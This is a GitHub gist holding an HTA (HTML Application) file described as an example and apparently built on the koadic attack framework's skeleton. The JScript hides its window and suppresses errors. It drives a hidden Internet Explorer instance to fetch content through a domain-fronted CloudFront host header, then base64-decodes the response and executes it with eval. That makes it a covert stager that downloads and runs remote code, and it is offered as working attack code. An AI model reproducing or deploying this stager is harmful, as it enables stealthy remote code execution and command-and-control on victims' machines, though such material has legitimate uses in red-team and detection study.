Skip to content

Instantly share code, notes, and snippets.

@leoloobeek
Last active July 24, 2023 00:39
  • Star 2 You must be signed in to star a gist
  • Fork 2 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save leoloobeek/31b2bbc5f129650c2a67bb40d14282ab to your computer and use it in GitHub Desktop.
HTA example for
<html>
<head>
<script language="JScript">
// HTA skeleton taken from https://github.com/zerosum0x0/koadic
window.resizeTo(1, 1);
window.moveTo(-2000, -2000);
window.blur();
try
{
window.onfocus = function() { window.blur(); }
window.onerror = function(sMsg, sUrl, sLine) { return false; }
}
catch (e){}
</script>
<script language="JScript">
function decodeBase64(base64) {
var dm = new ActiveXObject("Microsoft.XMLDOM");
var el = dm.createElement("tmp");
el.dataType = "bin.base64";
el.text = base64;
var b64bytes = el.nodeTypedValue;
var asc = new ActiveXObject("System.Text.ASCIIEncoding");
return asc.GetString(b64bytes);
}
var ie_com = new ActiveXObject("InternetExplorer.Application");
ie_com.Silent = true;
ie_com.Visible = false;
var headers = "Host: <SNIP>.cloudfront.net\r\n";
ie_com.Navigate2("http://www.irs.com/", 14, 0, null, headers);
while(ie_com.Busy) {
var shell = new ActiveXObject("WScript.Shell");
// WScript.Sleep will not work from an HTA
shell.Run("ping 127.0.0.1 -n 1", 0, true);
}
var resp = ie_com.document.body.innerHTML
ie_com.Quit();
decoded = decodeBase64(resp);
eval(decoded);
window.close();
self.close();
</script>
<hta:application caption="no" showInTaskBar="no" windowState="minimize"
navigable="no" scroll="no" />
<!-- -->
</head>
<body>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment